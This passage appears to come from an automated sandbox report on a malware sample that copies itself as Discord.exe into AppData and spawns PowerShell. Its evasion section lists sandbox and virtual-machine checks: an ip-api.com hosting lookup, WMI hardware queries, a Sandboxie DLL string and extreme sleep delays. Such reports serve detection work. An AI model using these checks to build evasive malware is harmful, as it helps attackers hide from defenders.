Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Discord.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: s3OBQLA3xR.exe, Discord.exe.0.dr Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Memory allocated: 29A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Memory allocated: 1ABA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: 730000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: 1A5F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: B00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: 1A600000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: 11A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: 1AD30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: C40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: 1A6B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: A30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Discord.exe Memory allocated: 1A900000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Discord.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Discord.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Discord.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Discord.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Window / User API: threadDelayed 8028 Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Window / User API: threadDelayed 1794 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6392 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3387 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8143 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1430 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8240 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1096 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7627
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2010
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe TID: 7524 Thread sleep time: -40582836962160988s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep count: 8143 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep count: 1430 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700 Thread sleep count: 7627 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272 Thread sleep count: 2010 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 7588 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 796 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 7972 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Discord.exe TID: 7832 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Discord.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Discord.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Discord.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Discord.exe File Volume queried: C:\ FullSizeInformation
